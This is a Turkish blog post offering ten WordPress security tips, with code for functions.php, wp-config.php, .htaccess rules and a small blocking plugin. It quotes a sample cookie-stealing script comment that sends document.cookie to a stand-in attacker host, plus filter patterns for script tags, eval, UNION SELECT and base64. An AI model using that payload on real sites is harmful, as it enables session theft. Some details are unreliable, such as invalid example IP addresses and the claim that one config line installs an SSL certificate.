İnternet üzerinden yaptığımız her şey için güvenliğimiz olsun isteriz. Aynı zamanda, paylaştıklarımızın bize özel kalması ve başkaları tarafından kullanılmaması bir o kadar da önemlidir. Peki, web sitesi veya blog hazırlarken kullandığımız platformlar bunu ne derece destekliyor?
Tabi ki her platformun güvenlik konusunda kendine göre güçlü ve zayıf noktaları var. Bunları aşmak ne derece mümkün?
İşte WordPress tabanlı oluşturulan web siteleri bloglar için 10 kolay güvenlik ipucu:
1. Gereksiz Bilgilerin Gözükmesini Engelleyin
WordPress hesabınıza bağlanmak istediğinizde CMS (İçerik Yönetim Sistemi) size hataverebilir ve bunun nedenini de açıklar. İyi ihtimalle, şifrenizi unutmuşsunuzdur. Başka bir ihtimal ise, hesabınızı ele geçirmek isteyen kişiler olabilir.
Bağlantı hataları koduna bağlı olarak bir kod ile bu sorundan kurtulabilirsiniz. Bunun için içeriğinizde yer alan
functions.php dosyasını açın ve aşağıda yazan kodu yerleştirin:
[php]add_filter(‘login_errors’,create_function(‘$a’, “return null;”));[/php]
Dosyayı bu haliyle kaydettiğiniz takdirde bir daha oturum açarken hata mesajı almazsınız.
2. SSL Kullanın
SSL, Secure Sockets Layer açılımına sahip bir protokoldür. Türkçe’ye Güvenli Yuva Katmanı olarak çevrilebilir ve güvenlik amacıyla kullanılır. İnternet üzerinden şifre ile gerçekleştirdiğiniz her işlemi, kendisi de şifreleyerek iletir ve böylece gizlilik gerektiren tüm işlemlerinizi gönül rahatlığıyla gerçekleştirebilirsiniz.
SSL’in web üzerinde aktif olup olmadığını tarayacınızın herhangi bir yerde gözüken asmakilit simgesi ile anlayabilirsiniz. Ayrıca, bu simgeye çift tıklayarak kullanılan SSL Sertifikası’nın kimden alındığı, geçerlilik süresi gibi bilgilere ulaşabilirsiniz.
Eğer web sunucunuz SSL kullanımını destekliyorsa, WordPress ile oluşturulmuş site ve bloglarda rahatlıkla etkinleştirilebilir. Bunun için, WordPress donanımındaki döngülerde yer alan
wp-config.php dosyasını açıp;
[php]define(‘FORCE_SSL_ADMIN’, true);[/php]
kodunu yerleştirmeniz yeterli. Dosyayı kaydettiğiniz zaman SSL SertifikasınıWordPress yazılımınıza yüklemiş olacaksınız.
3. .htaccess Kullanın
WordPress kullanıcıları için
wp-config.php dosyası en önemli dosyalardan biridir, çünkü bu dosya veritabanınıza ulaşabilmeniz için gereken kullanıcı adınız, parolanız gibi bütün hayati bilgileri içerir.
.htaccess dosyası ise istenmeyen kişilerin dosyalarınıza ulaşmasını engelleyen enbaşarılı dosyadır. Bu dosya
wp-config.php dosyası gibi WordPress donanımındaki döngüde yer alır ve mutlaka orijinal halinin bir yedeği bulunmalıdır.
wp-admin.phpdosyasına kötü niyetli yazılımların erişmesini engellemek için aşağıdaki kodu
.htaccessdosyasının bir kopyasına yerleştirin:
[php]
< files wp-config.php>
order allow,deny
deny from all
< /files>
[/php]
4. İstenmeyen Kişileri ve Yazılımları Kara Listeye Alın
Blogunuzda spam niteliğindeki yorumlara eminim ki çok sık rastlıyorsunuzdur. Spamyorumları yazan yazılımların veya kişilerin erişimini engelleyerek bu sorundan kolayca kurtulabilirsiniz. Bunun için spam mesajları gönderen bilgisayarın IP adresini bilmeniz yeterli.
Örnek olarak; 424.546.7.68 IP adresi bizim erişimini engellemek istediğimiz IP adresiolsun.
.htaccess dosyasının orijinalinin bir kopyasını alın ve şu kodu ekleyin:
[php]
order allow,deny
allow from all
deny from 424.546.7.68[/php]
Bu kod, blogunuza 424.546.7.68 IP adresi dışında herkesin girebileceğini belirtir. Daha fazla kişiyi engellemek için bu kodu tekrar tekrar yazmaya gerek yok. Örnek olarak: 583.964.6.94 ve 967.694.3.75 IP adreslerini de engellemek isteyelim. Bu durumda;
[php]order allow,deny
allow from all
deny from 424.546.7.68
deny from 583.964.6.94
deny from 967.694.3.75[/php]
kodumuz bu şekli alır. Yani, her adres için bir satır eklememiz yeterli.
5. Blogunuzu Gereksiz Kodlara Karşı Koruyun
Burada bahsedilen gereksiz kodlar, çeşitli paylaşımlarınızın altındaki yorumlarda bulunan kodlardır. Örneğin;
[php]Güzel ve yararlı bir paylaşım olmuş, teşekkürler. < script > document.location=’http://some_attacker/cookie.cgi?’ + document.cookie< /script >[/php]
Bu ve buna benzer, kod içeren yorumlar genelde kötü niyetli yazılımlar tarafından yapılmıştır. Bu nedenle bundan korunmak önemlidir.
.htaccess dosyasını kullanarak bu tarz yazılımların blogumuza ulaşmasını engelleyebiliriz. Aşağıda yazan kodun esas olarak yaptığı, yorumun < script > içerip içermediği ve kötü niyetli olup olmadığını kontrol etmektir.
[php]Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (< |%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L][/php]
Bu kodu yine
.htaccess dosyasına yerleştirmemiz gerekiyor. Burada tekrardan bu dosyanın orijinalinin yedeğinin olup olmadığını kontrol etmenin önemli bir nokta olduğunu hatırlatalım. Eğer yazdığımız bu kod, bir yorumdaki bu gereksiz kodların zararlı bir yazılımdan geldiğini tespit ederse yazılım 403 numaralı, “giriş reddedildi/yasak” anlamına gelen hatayı verecek ve blogumuza ulaşamayacaktır.
6. İçerik Temizleyicilere Karşı Koyun
Zaman içerisinde insanlar web siteniz ya da blogunuzdaki içeriği alıp kullanmaya başlayacaklardır. Bu durumda hotlinking denilen bir durum meydana gelir ki, bu sizin sunucunuzun bant genişliğini doldurmanıza neden olabilir.
Bundan kurtulmak içinse yine
.htaccess dosyasına ihtiyacımız var. Bu dosyanın orijinalinin yedeğini aldıysak, aşağıdaki kodu bu dosyaya ekliyoruz:
[php]RewriteEngine On
#Replace ?mysite.com/ with your blog url
RewriteCond %{HTTP_REFERER} !^http://(.+.)?mysite.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
#Replace /images/nohotlink.jpg with your “don’t hotlink” image url
RewriteRule .*.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L][/php]
Bu kod ile birlikte dosyayı kaydettikten sonra, kimse sizin resimlerinize linkveremeyecek.
7. Blogunuzu Korumak İçin Bir Eklenti Oluşturun
Hackerlar ve kötü niyetli yazılımlar, öncelikle blogunuzun zayıf noktalarını bulmak için çeşitli yöntemler deneyeceklerdir. WordPress bu konuda iyi bir korumaya sahiptir, ancak yine de bu tarz durumları tamamen engellemez, aşılabilirdir.
Bir “not defteri”ne aşağıdaki kodu yazın ve
blockbadqueries.php ismiyle kaydedin:
[php]< ?php /* Plugin Name: Block Bad Queries Plugin URI:http://perishablepress.com/press/2009/12/22/protect-wordpress-against-malicious-url-requests/ Description: Protect WordPress Against Malicious URL Requests Author URI: http://perishablepress.com/ Author: Perishable Press Version: 1.0 */ global $user_ID; if($user_ID) { if(!current_user_can(‘level_10')) { if (strlen($_SERVER['REQUEST_URI']) > 255 ||
strpos($_SERVER['REQUEST_URI'], “eval(“) ||
strpos($_SERVER['REQUEST_URI'], “CONCAT”) ||
strpos($_SERVER['REQUEST_URI'], “UNION+SELECT”) ||
strpos($_SERVER['REQUEST_URI'], “base64¨)) {
@header(“HTTP/1.1 414 Request-URI Too Long”);
@header(“Status: 414 Request-URI Too Long”);
@header(“Connection: Close”);
@exit;
}
}
}
?>[/php]
Sonrasında bu dosyayı,
wp-content/plugins dizinine yerleştirin, aktive ettiğinizde diğer eklentiler gibi davranacak ve sizi saldırılardan koruyacaktır.
8. WordPress’in Hangi Versiyonunu Kullandığınız Gözükmesin
WordPress otomatik olarak hangi versiyonunun kullanıldığını görüntüler. Eğer son versiyonu kullanıyorsanız, bu genel olarak bir sorun teşkil etmez. Eğer son versiyonu kullanmıyorsanız, WordPress bunu yine de görüntüler. Bu önemli bir bilgidir ve blogunuza zarar vermek isteyen kişilerin bunu bilmesi kötü sonuçlara neden olabilir.
Bu numaranın gözükmemesi için temanızın
functions.php dosyasına aşağıdaki kodu yerleştirin:
[php]remove_action(‘wp_head’, ‘wp_generator’);[/php]
Dosyayı kaydedip, sayfayı yenilediğinizde versiyon bilgisi yok olacaktır.
9. Kullanıcı Adı “Admin” Olarak Kalmasın
Şifre kırmanın çeşitli yöntemleri vardır, ancak en kolayı değişik şifre kombinasyonlarını denemektir. Bu amaçla, çeşitli yazılım modülleri geliştirilmiştir. Tabi ki şifre tek başına yeterli olmadığı için kullanıcı adının da biliniyor olması, istenmeyen kişilerin kullanıcı adınızı ve şifrenizi kullanarak blogunuza giriş yapmasına neden olacaktır. Bu nedenle size WordPress’in atadığı “admin” kullanıcı adı yerine tahmin etmesi zor bir kullanıcı adı kullanmak gerekir.
WordPress’in 3.0 versiyonunda kullanıcı adını siz seçebiliyorsunuz, bu nedenle burada yazılanlar daha eski versiyonlar için geçerlidir.
Kullanıcı adını değiştirmek için, WordPress Admin Paneli’ne aşağıdaki kodu ekleyebilirsiniz:
[php]UPDATE wp_users SET user_login = ‘Buraya Yeni Kullanıcı Adınızı Yazın’ WHERE user_login = ‘Admin’;[/php]
10. Dizininizin Gözükmesini Engelleyin
Bu da bir güvenlik önlemidir, çünkü www.alanadınız.com/wp-includes adresine giren bir kişi dosyaların ne zaman güncellendiğini görebilir ve onlara erişebilir.
Bunun için aşağıda yazan iki maddeyi de uygulamanız gerekiyor:
• İlk olarak ya boş bir
index.html dosyası ekleyin, ya da kopyalanmış
.htaccess dosyanızın başına şu satırı ekleyin:
[php]Options All –Indexes[/php]
Hocam çok arıyodum bunu teşekkürler